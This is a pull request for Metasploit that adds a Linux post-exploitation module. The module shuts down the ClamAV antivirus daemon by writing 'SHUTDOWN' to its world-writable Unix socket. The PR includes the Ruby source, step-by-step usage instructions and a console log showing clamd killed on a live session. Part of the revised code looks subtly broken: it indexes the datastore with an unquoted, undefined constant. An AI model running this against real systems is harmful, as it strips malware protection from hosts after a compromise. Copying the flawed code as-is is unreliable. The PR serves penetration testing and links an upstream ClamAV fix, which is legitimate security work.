### PR TITLE
Disable clamav via unix socket

### DIFF
--- a/documentation/modules/post/linux/manage/disable_clamav.md
+++ b/documentation/modules/post/linux/manage/disable_clamav.md
@@ -1,0 +1,55 @@
+### Description
+This module will cause the ClamAV service to be shutoff on Linux hosts. 
+ClamAV uses a Unix socket that allows non-privileged users to interact with the ClamAV daemon via utilities like "clamscan".
+However, no additional checks are required to trigger ClamAV's shutdown.
+
+## Verification Steps
+### Shuting off ClamAV
+  1. Launch `msfconsole`
+  2. Get a Meterpreter shell on a Linux host that's also running ClamAV.
+  3. Do: `use post/linux/manage/disable_clamav`
+  4. Do: `set SESSION <session number on the Linux host>`
+  6. Do: `exploit -j`
+  7. The daemon should be shutoff.
+
+## Scenarios
+```
+msf6 post(linux/manage/disable_clamav) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information               Connection
+  --  ----  ----                   -----------               ----------
+  4         meterpreter x86/linux  dllcoolj @ 192.168.130.1  127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)
+
+msf6 post(linux/manage/disable_clamav) > show options
+
+Module options (post/linux/manage/disable_clamav):
+
+   Name                Current Setting        Required  Description
+   ----                ---------------        --------  -----------
+   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
+   SESSION             4                      yes       The session to run this module on
+
+
+View the full module info with the info, or info -d command.
+
+msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
+[*] exec: ps -ef | grep 'clamd'
+
+clamav    132021       1 16 18:51 ?        00:00:09 clamd
+dllcoolj  132533   71177  0 18:52 pts/3    00:00:00 sh -c ps -ef | grep 'clamd'
+dllcoolj  132535  132533  0 18:52 pts/3    00:00:00 grep clamd
+msf6 post(linux/manage/disable_clamav) > exploit -j
+[*] Post module running as background job 10.
+msf6 post(linux/manage/disable_clamav) >
+[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
+[+] File does exist and is writable!
+[*] Shutting down ClamAV!
+
+msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
+[*] exec: ps -ef | grep 'clamd'
+
+dllcoolj  132927  132925  0 18:52 pts/3    00:00:00 grep clamd
+```

--- a/modules/post/linux/manage/disable_clamav.rb
+++ b/modules/post/linux/manage/disable_clamav.rb
@@ -2,55 +2,45 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require "socket"
+require 'socket'
 class MetasploitModule < Msf::Post
   Rank = ExcellentRanking
 
   include Msf::Post::File
   include Msf::Post::Unix
 
-  def initialize(info = {})
+  def initialize(_info = {})
     super(
-      update_info(
-        info,
-        'Name' => 'Disable ClamAV',
-        'Description' => %q{
+      'Name' => 'Disable ClamAV',
+      'Description' => %q{
           This module will write to the ClamAV Unix socket to shutoff ClamAV.
         },
-        'License' => MSF_LICENSE,
-        'Author' => [
-          'DLL_Cool_J'
-        ],
-        'Platform' => [ 'linux' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ],
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-              stdapi_fs_separator
-            ]
-          }
-        }
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'DLL_Cool_J'
+      ],
+      'Platform' => [ 'linux' ],
+      'SessionTypes' => [ 'meterpreter', 'shell' ]
       )
-    )
     register_options(
       [
-        OptString.new("CLAMAV_UNIX_SOCKET", [true, "ClamAV unix socket", "/run/clamav/clamd.ctl" ]),
-      ], self.class
+        OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ])
+      ]
     )
   end
 
   def run
     clamav_socket = datastore['CLAMAV_UNIX_SOCKET']
     print_status("Checking file path #{clamav_socket} exists and is writable... ")
-		if writable?("#{clamav_socket}")
-			print_good("File does exist and is writable!")
+    if writable?(datastore[CLAMAV_UNIX_SOCKET].to_s)
+      print_good('File does exist and is writable!')
 
-      Socket.unix("/run/clamav/clamd.ctl") do |sock|
-        print_status("Shutting down ClamAV!")
-				sock.write("SHUTDOWN")
-			end
-			return true
+      Socket.unix(datastore[CLAMAV_UNIX_SOCKET].to_s) do |sock|
+        print_status('Shutting down ClamAV!')
+        sock.write('SHUTDOWN')
+      end
+      return true
     end
-	end
+  end
 
 end

--- a/modules/post/linux/manage/disable_clamav.rb
+++ b/modules/post/linux/manage/disable_clamav.rb
@@ -2,7 +2,6 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
 require "socket"
 class MetasploitModule < Msf::Post
   Rank = ExcellentRanking
@@ -40,23 +39,18 @@ class MetasploitModule < Msf::Post
     )
   end
 
-	def check_unix_socket_writable
-		if writable?("#{clamav_socket}")
-			print_good("file does exist and is writable!")
-			return true
-    print_bad("file is not writable!")
-    return false
-	end
-
   def run
     clamav_socket = datastore['CLAMAV_UNIX_SOCKET']
     print_status("Checking file path #{clamav_socket} exists and is writable... ")
-		if check_unix_socket_writable
-      Socket.unix("#{clamav_socket}") do |sock|
-          print_status("Shutting down ClamAV!")
-          sock.write("SHUTDOWN")
-      end
+		if writable?("#{clamav_socket}")
+			print_good("File does exist and is writable!")
+
+      Socket.unix("/run/clamav/clamd.ctl") do |sock|
+        print_status("Shutting down ClamAV!")
+				sock.write("SHUTDOWN")
+			end
 			return true
     end
 	end
+
 end


### PR DESCRIPTION
This PR includes an additional metasploit module that will disable ClamAV on Linux systems.
The bug resides in the ClamAV Unix socket permitting any user to submit the "shutdown" command which will disable ClamAV.

This is bug is referenced in an open PR in the ClamAV repo [here](https://github.com/Cisco-Talos/clamav/pull/347).

This module differs from [clamav_control](https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/auxiliary/scanner/misc/clamav_control.rb) as it requires a Unix socket to interact with.

## Verification

List the steps needed to make sure this thing works

```## Verification Steps
### Shuting off ClamAV
  1. Launch `msfconsole`
  2. Get a Meterpreter shell on a Linux host that's also running ClamAV.
  3. Do: `use post/linux/manage/disable_clamav`
  4. Do: `set SESSION <session number on the Linux host>`
  6. Do: `exploit -j`
  7. The daemon should be shutoff.

## Scenarios

msf6 post(linux/manage/disable_clamav) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  4         meterpreter x86/linux  dllcoolj @ 192.168.130.1  127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)

msf6 post(linux/manage/disable_clamav) > show options

Module options (post/linux/manage/disable_clamav):

   Name                Current Setting        Required  Description
   ----                ---------------        --------  -----------
   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
   SESSION             4                      yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

clamav    132021       1 16 18:51 ?        00:00:09 clamd
dllcoolj  132533   71177  0 18:52 pts/3    00:00:00 sh -c ps -ef | grep 'clamd'
dllcoolj  132535  132533  0 18:52 pts/3    00:00:00 grep clamd
msf6 post(linux/manage/disable_clamav) > exploit -j
[*] Post module running as background job 10.
msf6 post(linux/manage/disable_clamav) >
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[*] Shutting down ClamAV!

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

dllcoolj  132927  132925  0 18:52 pts/3    00:00:00 grep clamd
```
## Video

A walk through demonstrating this module can be seen [here](https://youtu.be/n1tWDj2VsMw).